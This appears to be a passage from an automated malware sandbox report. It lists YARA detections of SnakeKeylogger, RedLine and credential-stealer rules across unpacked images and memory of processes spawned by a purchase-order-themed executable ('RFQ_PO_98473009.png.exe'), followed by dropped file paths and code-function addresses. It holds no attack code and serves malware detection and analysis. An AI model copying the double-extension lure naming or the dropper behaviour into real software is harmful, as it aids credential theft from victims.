                      Source: 18.2.Native_New-Nova.exe.34e5570.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 19.2.Native_snake01.exe.4a70000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 19.2.Native_snake01.exe.4a70000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 19.2.Native_snake01.exe.4a70000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 10.2.Native_New-Nova.exe.3640190.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 10.2.Native_New-Nova.exe.3640190.8.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 18.0.Native_New-Nova.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 9.2.RFQ_PO_98473009.png.exe.27b4740.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 10.2.Native_New-Nova.exe.21b183e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 10.2.Native_New-Nova.exe.21b183e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 10.2.Native_New-Nova.exe.2520f08.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 10.2.Native_New-Nova.exe.2520f08.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 19.3.Native_snake01.exe.5e03c0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 19.3.Native_snake01.exe.5e03c0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 12.2.Native_snake01.exe.49c0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 12.2.Native_snake01.exe.49c0000.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 12.2.Native_snake01.exe.49c0000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 19.3.Native_snake01.exe.5e03c0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 18.2.Native_New-Nova.exe.34e5570.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 18.2.Native_New-Nova.exe.34e5570.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 10.2.Native_New-Nova.exe.3615570.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 10.2.Native_New-Nova.exe.3615570.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 12.2.Native_snake01.exe.21c02f6.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 12.2.Native_snake01.exe.21c02f6.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 12.2.Native_snake01.exe.21c02f6.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 18.3.Native_New-Nova.exe.55fec8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 18.3.Native_New-Nova.exe.55fec8.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 10.2.Native_New-Nova.exe.3616478.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 10.2.Native_New-Nova.exe.3616478.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 19.2.Native_snake01.exe.4a70f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 19.2.Native_snake01.exe.4a70f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 19.2.Native_snake01.exe.4a70f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 10.2.Native_New-Nova.exe.3640190.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 10.2.Native_New-Nova.exe.3640190.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 12.2.Native_snake01.exe.4a50000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 12.2.Native_snake01.exe.4a50000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 12.2.Native_snake01.exe.4a50000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 19.2.Native_snake01.exe.1fc02f6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 19.2.Native_snake01.exe.1fc02f6.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 19.2.Native_snake01.exe.1fc02f6.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 19.2.Native_snake01.exe.1fc1216.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 19.2.Native_snake01.exe.1fc1216.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 19.2.Native_snake01.exe.1fc1216.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 18.2.Native_New-Nova.exe.34e6478.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 18.2.Native_New-Nova.exe.34e6478.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 10.3.Native_New-Nova.exe.7693e8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 10.3.Native_New-Nova.exe.7693e8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 12.0.Native_snake01.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 19.2.Native_snake01.exe.1fc1216.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 19.2.Native_snake01.exe.1fc1216.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 19.2.Native_snake01.exe.1fc1216.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 10.0.Native_New-Nova.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 19.2.Native_snake01.exe.4a70000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 18.2.Native_New-Nova.exe.4a60000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 19.2.Native_snake01.exe.4a70000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 18.2.Native_New-Nova.exe.4a60000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 19.2.Native_snake01.exe.4a70000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 12.2.Native_snake01.exe.49c0f20.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 12.2.Native_snake01.exe.49c0f20.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 12.2.Native_snake01.exe.49c0f20.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 10.3.Native_New-Nova.exe.7693e8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 10.3.Native_New-Nova.exe.7693e8.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 17.2.lVbhkOPdhyxT.exe.17a46b8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 10.2.Native_New-Nova.exe.3615570.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 10.2.Native_New-Nova.exe.3615570.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 18.2.Native_New-Nova.exe.4a60000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 18.2.Native_New-Nova.exe.4a60000.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 10.2.Native_New-Nova.exe.21b183e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 10.2.Native_New-Nova.exe.21b183e.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 12.2.Native_snake01.exe.21c02f6.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 12.2.Native_snake01.exe.21c02f6.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 12.2.Native_snake01.exe.21c02f6.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 12.2.Native_snake01.exe.49c0f20.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 12.2.Native_snake01.exe.49c0f20.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 12.2.Native_snake01.exe.49c0f20.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 19.2.Native_snake01.exe.1fc02f6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 19.2.Native_snake01.exe.1fc02f6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 19.2.Native_snake01.exe.1fc02f6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 18.2.Native_New-Nova.exe.34e6478.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 18.2.Native_New-Nova.exe.34e6478.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 12.2.Native_snake01.exe.21c1216.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 12.2.Native_snake01.exe.21c1216.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 12.2.Native_snake01.exe.21c1216.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 00000012.00000002.3634743703.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000012.00000002.3634743703.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000012.00000003.1257785893.000000000055F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000012.00000002.3632429865.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000012.00000002.3632429865.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 00000013.00000003.1257746964.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0000000A.00000002.3626656997.00000000025A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0000000A.00000002.3626656997.00000000025A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0000000C.00000002.3623510104.0000000002180000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0000000A.00000002.3624684011.0000000002520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0000000A.00000002.3624684011.0000000002520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 0000000A.00000002.3622736534.0000000002171000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0000000A.00000002.3634096660.0000000003611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 00000012.00000002.3630979840.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000012.00000002.3623045015.00000000021F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0000000A.00000003.1209065105.0000000000769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000013.00000002.3620379539.0000000001F80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: Native_New-Nova.exe PID: 7852, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: Native_snake01.exe PID: 7944, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: Native_New-Nova.exe PID: 3000, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: Native_snake01.exe PID: 2524, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Initial sample is a PE file and has a suspicious name
                      Source: initial sampleStatic PE information: Filename: RFQ_PO_98473009.png.exe
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess Stats: CPU usage > 49%
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeCode function: 0_2_01453E400_2_01453E40
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeCode function: 0_2_01456F900_2_01456F90
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeCode function: 0_2_0145DA7C0_2_0145DA7C
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeCode function: 0_2_079F83800_2_079F8380
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeCode function: 0_2_079FC7980_2_079FC798
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeCode function: 0_2_079FC7880_2_079FC788
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeCode function: 0_2_079FC3480_2_079FC348
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeCode function: 0_2_079F83710_2_079F8371
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeCode function: 0_2_079FE2780_2_079FE278
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeCode function: 0_2_079FE2680_2_079FE268
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeCode function: 0_2_079FEDD80_2_079FEDD8
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeCode function: 0_2_079FCBD00_2_079FCBD0
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeCode function: 0_2_079FCBCE0_2_079FCBCE
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_00408C6010_2_00408C60
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_0040DC1110_2_0040DC11
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_00407C3F10_2_00407C3F
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_00418CCC10_2_00418CCC
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_00406CA010_2_00406CA0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_004028B010_2_004028B0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_0041A4BE10_2_0041A4BE
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_0041824410_2_00418244
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_0040165010_2_00401650
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_00402F2010_2_00402F20
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_004193C410_2_004193C4
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_0041878810_2_00418788
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_00402F8910_2_00402F89
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_00402B9010_2_00402B90
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_004073A010_2_004073A0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_0200143710_2_02001437
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_0200144810_2_02001448
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_0200119810_2_02001198
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_020011A810_2_020011A8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_04BF89D010_2_04BF89D0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_04BFB6B010_2_04BFB6B0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_04BF22E810_2_04BF22E8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_04BF89C010_2_04BF89C0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_04BFB63010_2_04BFB630
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_04BFF21810_2_04BFF218
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DF54A810_2_05DF54A8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DF004010_2_05DF0040
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DFA2E810_2_05DFA2E8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DF7E5010_2_05DF7E50
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DF4E4810_2_05DF4E48
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DF061910_2_05DF0619
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DFF5D010_2_05DFF5D0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DFF5C010_2_05DFF5C0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DF79F810_2_05DF79F8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DF49F010_2_05DF49F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DF79E810_2_05DF79E8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DF49E110_2_05DF49E1
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DFD5E010_2_05DFD5E0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DF459810_2_05DF4598
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DF759010_2_05DF7590
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DF458810_2_05DF4588
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DF75A010_2_05DF75A0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DF714810_2_05DF7148
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DF414010_2_05DF4140
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DFF17810_2_05DFF178
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DFF16910_2_05DFF169
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DFED1010_2_05DFED10
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DF713910_2_05DF7139
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DF413110_2_05DF4131
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DFED2010_2_05DFED20
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DF3CD710_2_05DF3CD7
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DFE8C810_2_05DFE8C8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DF6CF010_2_05DF6CF0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DF3CE810_2_05DF3CE8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DF6CE110_2_05DF6CE1
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DF549C10_2_05DF549C
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DF689810_2_05DF6898
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DF389010_2_05DF3890
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DF688910_2_05DF6889
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DF388010_2_05DF3880
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DFE8B810_2_05DFE8B8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DF644010_2_05DF6440
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DFE47010_2_05DFE470
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DFE46010_2_05DFE460
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DFE01810_2_05DFE018
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DFE00810_2_05DFE008
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DF000710_2_05DF0007
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DF643010_2_05DF6430
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DFDBC010_2_05DFDBC0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DFDBB010_2_05DFDBB0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DFD76810_2_05DFD768
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DFFA1810_2_05DFFA18
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DF4E3910_2_05DF4E39
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DFFA2810_2_05DFFA28
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05E784D810_2_05E784D8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05E7668810_2_05E76688
